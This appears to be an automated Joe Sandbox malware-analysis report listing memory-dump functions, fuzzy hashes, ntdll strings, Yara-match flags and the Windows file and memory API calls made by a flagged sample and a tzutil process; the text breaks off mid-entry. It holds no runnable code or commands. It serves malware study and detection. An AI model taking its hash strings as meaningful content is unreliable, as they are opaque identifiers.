                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: 1a4b3260873ec6d715ab0c520e045cceeaf64850d8f3dcc7f05300e935beb4fa
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: 08D01236100248EFCB15DF55C890D9AB72AFBD8710F148019FD19077108A35ED62DA50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 447ae259f13416392d7df797501389cb387c11c0901f091d6026b0332ebc7943
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: B2C04C757015418FCF15DB1DD294F4577E4F754744F154890E905CB721E624E801CA10
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4907ea2b066eddc35caf169c99f90060e268c0f583ba502b4ce7efe9c89e7625
                                                              • Instruction ID: 02810798db1066d1a1cf479d2dcdb29bac42859c5e202a1b277dd87258fa775c
                                                              • Opcode Fuzzy Hash: 4907ea2b066eddc35caf169c99f90060e268c0f583ba502b4ce7efe9c89e7625
                                                              • Instruction Fuzzy Hash: 1D900275B0580012E140719C48985464005E7E0306B95C051E0424554CCA148A5A5361
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b78569b427e00e989d4d0b7132ab0a2ea73456cc022c874b278c8261eaccd3f5
                                                              • Instruction ID: f44f1666d09ef209627cb51b45c3077bdf6e4f7a77cd08948c652b575e2bab91
                                                              • Opcode Fuzzy Hash: b78569b427e00e989d4d0b7132ab0a2ea73456cc022c874b278c8261eaccd3f5
                                                              • Instruction Fuzzy Hash: 4D9002A5B01500429140719C48184066005E7E13063D5C155A0554560CC61889599369
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfabac3c2777eba355ece43c4672d82c406d8f883ea07039fe624d2997ff7160
                                                              • Instruction ID: a01454a4b9550121b05302f274716429318a62f2b36b0f2dee0379c907cb5d55
                                                              • Opcode Fuzzy Hash: dfabac3c2777eba355ece43c4672d82c406d8f883ea07039fe624d2997ff7160
                                                              • Instruction Fuzzy Hash: B7900275B0540802E150719C44287460005D7D0306F95C051A0024654DC7558B5977A1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d2afcc7f9c93bcaded4a32d29b6c0d1e7bb9411e5aacdc1f75d22e15dd1fa1e
                                                              • Instruction ID: ff15e7c94fd0d1c9c4c715d8e51275da1f980ca398b0ab18d09adf4c5c800d4c
                                                              • Opcode Fuzzy Hash: 2d2afcc7f9c93bcaded4a32d29b6c0d1e7bb9411e5aacdc1f75d22e15dd1fa1e
                                                              • Instruction Fuzzy Hash: 7B90027570140802E104719C48186860005D7D0306F95C051A6024655ED66589957231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21fcc72d660052474c047d10c3f7bf0e7688994f20cc22e6d19cc11a3912d778
                                                              • Instruction ID: 27d948913df111ddc88081c8087eca3b9d044d39cde21c6310df0d3b0612c8c6
                                                              • Opcode Fuzzy Hash: 21fcc72d660052474c047d10c3f7bf0e7688994f20cc22e6d19cc11a3912d778
                                                              • Instruction Fuzzy Hash: 7F90027570140802E180719C441864A0005D7D1306FD5C055A0025654DCA158B5D77A1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e16ca3558e5ad3385901e2264d8390e91567ba6a282d2fc26ba085ff13b30da
                                                              • Instruction ID: c88ba02455efaf4b2139030a8b50ebcea9713ea1d8e9820181b1bc05411dfb19
                                                              • Opcode Fuzzy Hash: 6e16ca3558e5ad3385901e2264d8390e91567ba6a282d2fc26ba085ff13b30da
                                                              • Instruction Fuzzy Hash: 7990027570544842E140719C4418A460015D7D030AF95C051A0064694DD6258E59B761
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                                                              • Instruction ID: e17992ca8a3c34bd884217003387bd5a6867b64d8d493f044df11efcf919e36c
                                                              • Opcode Fuzzy Hash: 17d8d5ab2970280c16cf858884efe4b959a8ea02e9f7e336f07904a5ef21056c
                                                              • Instruction Fuzzy Hash: EE9002E5701540929500B29C8418B0A4505D7E0206B95C056E1054560CC52589559235
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                                                              • Instruction ID: e4b55b88863f7ab3ef9ebc2d431e087dc74b36d8b6732df40a074d97b40c3c88
                                                              • Opcode Fuzzy Hash: 96e943a0c3b544fdceaad8e43ff9d411931c616c2056673797a5ff0398cdcf61
                                                              • Instruction Fuzzy Hash: 17900269721400025145B59C061850B0445E7D63563D5C055F1416590CC62189695321
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                                                              • Instruction ID: 889fd49eca3b873cb439e22732a3ec5e64950351c93b5a7749d4c28f1c6127d1
                                                              • Opcode Fuzzy Hash: 175e89d953e55c1e393dac52914be804f9d3fa0e22cf4d10fa92c2b185cbae54
                                                              • Instruction Fuzzy Hash: 5F90047D711400035105F5DC071C5070047D7D53573D5C071F1015550CD731CD755331
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                                                              • Instruction ID: 3bcfe5c298e04485f57fd5ecde75e51cde4a8b84cdb82f4c5f74a4f49e9ab351
                                                              • Opcode Fuzzy Hash: 33e766e9df34841cf6bc1469486453b4e361bf5934feb2d2d715b0d93f064c50
                                                              • Instruction Fuzzy Hash: A090026570140003E140719C542C6064005E7E1306F95D051E0414554CD915895A5322
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                                                              • Instruction ID: 4d517a52e65ce09ca2a1e8d9bbb5c995ee2d312e1a65bc90702dcdb31015d797
                                                              • Opcode Fuzzy Hash: c5cf12438b823f956fe96b2323a7d2627d747addfb644c7909dd4a31df87ad8b
                                                              • Instruction Fuzzy Hash: CD90026D71340002E180719C541C60A0005D7D1207FD5D455A0015558CC915896D5321
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                                                              • Instruction ID: 00d7bb50e0bd29b74387d006eaf27d2fe7647a25101e707d24da5d22013036fd
                                                              • Opcode Fuzzy Hash: 5a71eee9aa135b580ad0cd6b35d950ae13e8008b0e626e212d8eaabf490e48dc
                                                              • Instruction Fuzzy Hash: B590026570544442E100759C541CA060005D7D020AF95D051A1064595DC6358955A231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                                                              • Instruction ID: eca994b8e3190509e15cbba2affc40dfe564de9d33bcd716c41d94797e047145
                                                              • Opcode Fuzzy Hash: 8e42395254ff5e06ac1a0643e1ca9d0ecee36677234ae43fb2321cb5e27546e5
                                                              • Instruction Fuzzy Hash: 0090027574140402E141719C44186060009E7D0246FD5C052A0424554EC6558B5AAB61
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                                                              • Instruction ID: f6654d845c9738dc4ad5e6bda0590f3f0fce7891c9edc979525a14c3e5297c6f
                                                              • Opcode Fuzzy Hash: a40d813a6ed4865c491683621215e6d7d52be0f434351f74e723159b194d0d2e
                                                              • Instruction Fuzzy Hash: F090026574244152A545B19C44185074006E7E02467D5C052A1414950CC526995AD721
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                                                              • Instruction ID: c164b3e90e664baf9efa8afa7e33de3550cf97230e246d936597df8aac0599bb
                                                              • Opcode Fuzzy Hash: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                                                              • Instruction Fuzzy Hash: 6451F7B6A0451ABFCF11DB9C888097FFBB8BB18248B50C129F4A5D7641E334EE1087E0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                                                              • Instruction ID: 07870d4b69bb9f2da438649abf5535cad648d524ddbde6ccdb985888fa22b4ac
                                                              • Opcode Fuzzy Hash: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                                                              • Instruction Fuzzy Hash: 4951F471A00656ABDB22DE5EC994C7FBBF8EB44204B44847BE4D6D37D1E6B4EA008760
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013C4742
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013C46FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013C4655
                                                              • Execute=1, xrefs: 013C4713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013C4725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 013C4787
                                                              • ExecuteOptions, xrefs: 013C46A0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                                                              • Instruction ID: 9835da84f7a9f607c2d03c9e8ac3943d1c4a16c4ffbbfedaaf52e294a5a373a8
                                                              • Opcode Fuzzy Hash: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                                                              • Instruction Fuzzy Hash: 125127356003096AEF20BBA8DC95FBA77A9AF5471CF1400A9E605A7290EB709E45CF50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 02f15e79515ceb51fdbb22f5ed44dd524b90f8e55534d37adf7c6024477003f6
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 3381D470E052499EEF25CE6CE891FFEFFB1AF45368F184219D851A7299C7349840CB91
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                                                              • Instruction ID: 14311912f038fb75c5304432ac486590644f37c703222b08ef7f3a314f9ce6ea
                                                              • Opcode Fuzzy Hash: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                                                              • Instruction Fuzzy Hash: B521517AA00119ABDB11DF7EC844EEFBBF8EF54644F440126E945E7284E770E9018BA1
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013C02BD
                                                              • RTL: Re-Waiting, xrefs: 013C031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013C02E7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                                                              • Instruction ID: b2b41c9d531f0598e04ccfd4606c7f78b98952e9665d232f78eaaec3cbd697b1
                                                              • Opcode Fuzzy Hash: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                                                              • Instruction Fuzzy Hash: B5E1CE34604781DFE725CF2CC884B2ABBE9BB84728F140A1DF5A58B6E1D778D845CB42
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 013C7B8E
                                                              • RTL: Re-Waiting, xrefs: 013C7BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013C7B7F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                                                              • Instruction ID: e0ecd2604163cb0332a78b723ae71ed810b5c15bae7f25abebc27a9366e7efd8
                                                              • Opcode Fuzzy Hash: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                                                              • Instruction Fuzzy Hash: 0141E1353007039FDB21EF29D840B6AB7E5EF98718F000A1DF95ADB680DB71E8098B91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 013C72A3
                                                              • RTL: Re-Waiting, xrefs: 013C72C1
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013C7294
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                                                              • Instruction ID: d89f21c7ea50b30e9d3d88a68035c4559798781ffb03bc75266e8edac327d93a
                                                              • Opcode Fuzzy Hash: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                                                              • Instruction Fuzzy Hash: 8941F235700707ABDB20DF29CC41B66B7A6FB94B18F14061DFD55AB640DB31E8028BD1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                                                              • Instruction ID: 15c6f4a5f14cf09192b6a6d7bffb2ab9881f0b7e8d2b2b402fb6bf50e41c0503
                                                              • Opcode Fuzzy Hash: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                                                              • Instruction Fuzzy Hash: C731A7726001299FDB61DF3DCC44FEFB7F8EB44614F444466E949E3280EB70AA448B60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 0e55a7290639afee77711aa383ce3d25e5106acc39c4f820bc8f162f84f5aa2e
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 1191B471E2020A9BEF24DF6DC8816BEBBA5FF84728F14451AE956E72C0E73089458F11
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                                                              • Instruction ID: 7f0e4cd687eeac809c9956c413070de4c856c6c8b2b4a2a387200c390fea2c65
                                                              • Opcode Fuzzy Hash: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                                                              • Instruction Fuzzy Hash: 44812C71D00269DBDB35CB58CC44BEEB7B8AB48758F0141DAEA19B7640E7705E84CFA0

                                                              Execution Graph

                                                              Execution Coverage:2.4%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:439
                                                              Total number of Limit Nodes:71

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: e861d43d7e2fadebd1466bae3480e385565388d4a08d1792f9688bc5891d48e3
                                                              • Instruction ID: 4d7e44412627040c5d956211ec105fb3659d7b1c0d365ebd8d3a23aadf051cd0
                                                              • Opcode Fuzzy Hash: e861d43d7e2fadebd1466bae3480e385565388d4a08d1792f9688bc5891d48e3
                                                              • Instruction Fuzzy Hash: 73328BB0E05668CFEF28CF84C8947DDBBB6BB45308F5081D9D44A6B280CBB95A85CF55
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 026ACAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 026ACAEE
                                                              • FindClose.KERNELBASE(?), ref: 026ACAF9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction ID: 1bc7209f8335b744fe890a326cda0c10ce1de6920a8a6d65a688c5ed583b5998
                                                              • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction Fuzzy Hash: 8B3160719002487BDB20DFA4CC95FFF77BD9F44709F144599BA09A6180DAB0AE848FA4
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 026B957B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction ID: bf609c7b16192caa132078ff2748bc0ba9f4c124894e04ab4ad216b512e3b336
                                                              • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction Fuzzy Hash: C331CEB5A01248AFDB54DF98D880EEEB7F9AF8D704F108219F949A7340D730A951CFA5
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 026B96D6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction ID: 67af6767ee5af6324164e832fd41b0e18af1f62c4e3bb2eaa37a54eca5b218ed
                                                              • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction Fuzzy Hash: B331D2B5A00248ABDB14DF98D880EEFB7F9EF8D704F108209F958A7240D630A9518FA5
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(026A21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,026B82FF,026A21AE), ref: 026B99A8
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
